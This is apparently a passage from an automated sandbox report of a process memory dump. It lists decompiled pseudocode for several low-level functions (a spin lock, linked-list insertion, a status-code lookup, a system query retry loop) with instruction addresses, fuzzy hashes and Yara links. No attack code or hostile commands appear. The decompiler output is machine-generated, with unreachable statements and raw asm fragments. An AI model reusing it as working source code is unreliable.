						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x4c58628; // 0x0
						_t105 = _v28;
						_t80 =  *0x4c5862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x4c2fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x04b8dbe9
0x04b8dbf2
0x04b8dbf7
0x04b8dbf9
0x04b8dbfc
0x04b8dc00
0x04b8dc03
0x04b8dc14
0x04b8dd54
0x04b8dd54
0x04b8dd54
0x04b8dc18
0x04b8dc1d
0x04b8dc1d
0x04b8dc32
0x04b8dc3b
0x04b8dc3e
0x04b8dc46
0x04b8dd5b
0x04b8dd62
0x04b8dd64
0x04b8dd67
0x04b8dd69
0x04b8dd6b
0x04b8dd6e
0x04b8dd70
0x04b8dd73
0x04b8dd73
0x00000000
0x04b8dc4c
0x04b8dc4e
0x04bd3ae3
0x04bd3ae8
0x04bd3aea
0x04b8dce7
0x04b8dce9
0x04b8dcec
0x04b8dcee
0x04b8dcf0
0x04b8dcf3
0x04b8dcf5
0x04bd3af2
0x04bd3af5
0x04bd3af5
0x04b8dd06
0x04b8dd08
0x04b8dd0b
0x04b8dd12
0x04bd3b08
0x04b8dd18
0x04b8dd18
0x04b8dd18
0x04b8dd20
0x04b8dd23
0x04bd3b16
0x04bd3b16
0x04b8dd29
0x04b8dd2d
0x04b8dd36
0x04b8dd40
0x04b8dd51
0x04b8dd51
0x04b8dc54
0x04b8dc59
0x04b8dc59
0x04b8dc5e
0x04b8dc5e
0x04b8dc63
0x04b8dc66
0x04b8dc6b
0x04b8dc78
0x04b8dc7b
0x04b8dc81
0x04b8dc81
0x04b8dc83
0x04b8dc89
0x00000000
0x00000000
0x04b8dd7b
0x04b8dd7b
0x04b8dc8f
0x04b8dc8f
0x04b8dc92
0x04b8dc99
0x04b8dc9f
0x04b8dca5
0x04b8dcaa
0x04b8dcaa
0x04b8dcb3
0x04b8dcb8
0x04b8dcbb
0x04b8dcc1
0x04b8dccf
0x04b8dcd2
0x04b8dcd5
0x04b8dcd7
0x04b8dcda
0x04b8dcdc
0x04b8dcdc
0x04b8dce2
0x04b8dce4
0x00000000
0x04b8dce4

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc7905863fbc845b4c7e9d7acece7b3b9562ee5ec5c1a9a6f88b132ac97a09af
Instruction ID: ca12a0d74e836ef4fd51f2f9b02af38e0d5f24338fbf1c5754556a8ce0d78c5e
Opcode Fuzzy Hash: fc7905863fbc845b4c7e9d7acece7b3b9562ee5ec5c1a9a6f88b132ac97a09af
Instruction Fuzzy Hash: 83518C75A01605DFCB14EF68C490AAEBBF9FB48310F20859ED955A7380EB31BD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04B7EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04B7EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04B69080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x775ec21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04B62D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x04b7ef4b
0x04b7ef4d
0x04b7ef57
0x04b7f0bd
0x04b7f0c2
0x04b7f0d2
0x04b7f0d2
0x04b7f0c2
0x04b7ef5d
0x04b7ef5f
0x04b7ef67
0x04b7ef6a
0x04b7ef6d
0x04b7ef74
0x04b7ef7f
0x04b7ef82
0x04b7ef82
0x04b7ef86
0x04b7ef88
0x04b7ef8c
0x04b7ef8f
0x04b7ef8f
0x04b7ef8f
0x00000000
0x04b7ef91
0x04b7ef93
0x04b7efc4
0x04b7efc4
0x04b7efc4
0x04b7efca
0x04b7efd0
0x04b7f0a6
0x00000000
0x00000000
0x04b7f0af
0x04bcbb06
0x04bcbb0a
0x04b7f0b5
0x04b7f0b5
0x04b7f0b5
0x04b7f0b5
0x00000000
0x04b7efd6
0x04b7efd9
0x04b7f0de
0x04b7f0e2
0x04b7efdf
0x04b7efdf
0x04b7efdf
0x04b7efe5
0x04bcbafc
0x04bcbafc
0x04b7efe5
0x04b7efeb
0x04b7efed
0x04b7f00f
0x04b7f011
0x04b7f01a
0x04b7f01d
0x04b7f021
0x04b7f028
0x04b7f029
0x04b7f029
0x04b7f02c
0x00000000
0x04b7f02c
0x04b7eff3
0x04b7eff9
0x04b7f0ea
0x04b7f0ed
0x04b7f0ef
0x00000000
0x04b7f0ef
0x04b7f003
0x04bcbb12
0x04b7f045
0x04b7f049
0x04b7f051
0x04b7f09e
0x04b7f0a0
0x04b7f0a0
0x04b7f09e
0x04b7f053
0x04b7f064
0x04b7f064
0x04b7f06b
0x04bcbb1a
0x04bcbb1a
0x04b7f071
0x04b7f071
0x04b7f07d
0x04b7f082
0x04b7f08f
0x04b7f08f
0x04b7f009
0x04b7f00d
0x00000000
0x04b7f00d
0x04b7efd0
0x04b7ef97
0x04b7efa5
0x04b7efaa
0x00000000
0x04b7efac
0x04b7efac
0x04b7efac
0x00000000
0x04b7efb2
0x04b7f036
0x04b7f03a
0x04b7f040
0x04b7f090
0x00000000
0x04b7f092
0x04b7f042
0x00000000
0x04b7f042
0x04b7efb7
0x04b7efb9
0x04b7efbc
0x04b7efb0
0x04b7efb0
0x00000000
0x04b7efbe
0x04b7efbe
0x04b7efc1
0x00000000
0x04b7efc1
0x04b7efbc
0x04b7efaa
0x04b7ef91

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: a35de26b22c4c984264f36b0e11482dd8768755fd99a09702e5bda5d7dba45d2
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 3651EF30A04249EFEB24CF68C1D0BAEBBB1EF05314F1881E9D5659B381D375B989D791

Uniqueness

Uniqueness Score: -1.00%

Function 04C3740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E04C3740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E04BBD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E04BAF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04B84620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04B84620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E04BAF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04B84620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x04c3740d
0x04c3740d
0x04c37412
0x04c37413
0x04c37416
0x04c37418
0x04c3741c
0x04c3741f
0x04c37422
0x04c37422
0x04c37428
0x04c3742a
0x04c3742a
0x04c37451
0x04c37432
0x04c3744f
0x04c3744f
0x00000000
0x04c37434
0x04c37438
0x04c37443
0x04c37517
0x04c37517
0x04c3751a
0x04c37535
0x04c37520
0x04c37527
0x04c3752c
0x04c37531
0x04c37533
0x00000000
0x04c37533
0x00000000
0x04c37531
0x04c3754b
0x04c3754f
0x04c3755c
0x04c3755c
0x04c3755f
0x04c37560
0x04c37561
0x04c37562
0x04c37563
0x04c37568
0x04c3756a
0x04c3756c
0x04c3756d
0x04c3756d
0x04c3756f
0x04c37572
0x04c37574
0x04c37577
0x04c3757c
0x04c3757f
0x00000000
0x04c37551
0x04c37551
0x04c37551
0x04c37553
0x04c37553
0x04c37449
0x04c37449
0x04c3744c
0x04c3744c
0x00000000
0x04c3744c
0x04c37443
0x04c3750e
0x04c37514
0x04c37514
0x04c37455
0x04c37469
0x04c3746d
0x00000000
0x04c37473
0x04c37473
0x04c37476
0x04c37480
0x04c37484
0x04c3748e
0x04c37493
0x04c37493
0x04c37496
0x04c37499
0x04c374a1
0x04c374b1
0x04c374b5
0x00000000
0x04c374bb
0x04c374c1
0x04c374c1
0x04c374c4
0x04c374c5
0x04c374c6
0x04c374c7
0x04c374c8
0x04c374cd
0x00000000
0x04c374d3
0x04c374d3
0x04c374d6
0x04c374d8
0x04c374db
0x04c374dd
0x04c374e0
0x04c374e7
0x04c374ee
0x04c374ee
0x04c374f4
0x04c374f9
0x00000000
0x04c374fb
0x04c374fb
0x04c374fd
0x04c37500
0x04c37503
0x04c37505
0x04c37505
0x04c374f9
0x00000000
0x04c374cd
0x04c374b5
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 3ab4f899ad92ce7e43e6df8f33da0fc1f0ddd26d5a13219910cfbd648ddf080c
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: CC515AB1601606EFDB19CF54C480A96BBF6FF45305F19C1AAE9089F212E371FA46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04B92990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04B92990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x4c3ff00);
				E04BBD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4b41664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E04BAE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4b41668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E04BE51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4b4166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04B92AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04B76600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04B92C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E04B7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04B92AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04B92C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04B92ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E04BBD0D1(_t62);
				goto L28;
			}

0x04b92990
0x04b92992
0x04b92997
0x04b929a3
0x04b929a6
0x04b929ab
0x04b929ad
0x04b929b2
0x04bd5c80
0x04b929b8
0x04b929b8
0x04b929bb
0x04b929c0
0x04b929c5
0x04b929c6
0x04b929c6
0x04b929cb
0x00000000
0x00000000
0x04b929cd
0x04b929d0
0x04b929d9
0x04b929db
0x04b929dd
0x04b92a7f
0x04b92a84
0x04b92a87
0x04b92a89
0x04bd5ca1
0x04bd5ca3
0x00000000
0x04b92a8f
0x04b92a8f
0x00000000
0x04b92a8f
0x00000000
0x04b929e3
0x04b929e3
0x04b929e3
0x00000000
0x04b929e3
0x04b929dd
0x00000000
0x04b929db
0x04b929e6
0x04b929e9
0x04b929eb
0x04b929ed
0x04b929f3
0x04b929f5
0x04b929f8
0x04b929fa
0x04b92a97
0x04b92a9a
0x04b92a9d
0x04b92add
0x00000000
0x04b92a9f
0x04b92aa2
0x04b92aa5
0x04b92aa8
0x04b92aab
0x04bd5cab
0x04bd5caf
0x04bd5cc5
0x04bd5cda
0x04bd5cdc
0x04bd5cdf
0x04bd5ce5
0x00000000
0x04bd5ceb
0x04bd5ced
0x04bd5cee
0x00000000
0x04bd5cee
0x04bd5cb1
0x04bd5cb4
0x04bd5cb9
0x04bd5cbb
0x00000000
0x04bd5cbd
0x04bd5cbd
0x00000000
0x04bd5cbd
0x04bd5cbb
0x04b92ab1
0x04b92ab1
0x04b92ac4
0x04b92ac6
0x04b92ac6
0x00000000
0x04b92ac6
0x04b92aab
0x00000000
0x04b92a00
0x04b92a09
0x04b92a0e
0x04b92a21
0x04b92a24
0x04b92a35
0x04b92a3a
0x04b92a3d
0x04b92a42
0x04b92a59
0x04b92a59
0x04b92a5c
0x04b92a5f
0x04b92a5f
0x04b929fa
0x04b929f3
0x04b92a64
0x04b92a64
0x04b92a6b
0x04b92a6b
0x04b92a6d
0x04b92a72
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1afb35a68412957400f075f7d905081498611fc13851da54f05350be04f8fb89
Instruction ID: 0fb04ebbd086a48842d73267741b0e0fb10ac695016a0aa5c37715aed7e8d36b
Opcode Fuzzy Hash: 1afb35a68412957400f075f7d905081498611fc13851da54f05350be04f8fb89
Instruction Fuzzy Hash: 7A511672E00209AFDF29DF55C880ADEBBB5FF48314F1584E5E814AB260D335AD52DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04B94D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04B94D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4c5d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E04BAFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4c57bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E04BAB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04B84620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E04B6CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E04BAB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E04BAF380(_t67 + 0xc, 0x4b45138, 0x10) == 0) {
								 *0x4c560d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04B94F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04B94E70(0x4c586b0, 0x4b95690, 0, 0) != 0) {
					_t46 = E04B6CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x04b94d3b
0x04b94d4d
0x04b94d53
0x04b94d58
0x04b94d65
0x04b94d6c
0x04b94d71
0x04b94d77
0x04b94d7f
0x04b94d8c
0x04b94d8e
0x04b94dad
0x04b94db0
0x04b94db7
0x04b94db8
0x04b94db9
0x04b94dba
0x04b94dbb
0x04b94dc1
0x04b94dc8
0x04b94dcc
0x04b94dd5
0x04b94dde
0x04b94ddf
0x04b94de0
0x04b94de1
0x04b94de6
0x04b94de7
0x04b94de9
0x04b94df3
0x00000000
0x00000000
0x04bd6c7c
0x04bd6c8a
0x04bd6c8a
0x04bd6c9d
0x04bd6ca7
0x04bd6cac
0x04bd6cb2
0x04bd6cb9
0x00000000
0x04bd6cbf
0x04bd6cbf
0x00000000
0x04bd6cbf
0x04bd6cb9
0x04b94dfb
0x04bd6ccf
0x04bd6cd3
0x04b94e32
0x04b94e39
0x04bd6ce0
0x04bd6cf2
0x04bd6cf2
0x04bd6ce0
0x04b94e3f
0x04b94e41
0x04b94e51
0x04b94e51
0x04b94e03
0x04b94e03
0x04b94e09
0x04b94e0f
0x04b94e57
0x00000000
0x00000000
0x04b94e1b
0x04b94e30
0x04b94e5b
0x04b94e5b
0x00000000
0x04b94e30
0x04b94e11
0x04b94e11
0x04b94e16
0x00000000
0x04b94e16
0x04b94e01
0x00000000
0x04b94e01
0x04b94da5
0x04bd6c6b
0x00000000
0x04b94dab
0x04b94dab
0x00000000
0x04b94dab

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929d826ea2ba1e28e24d262e3b7aada714c4f9c5997ca15665382f5f662eb2c7
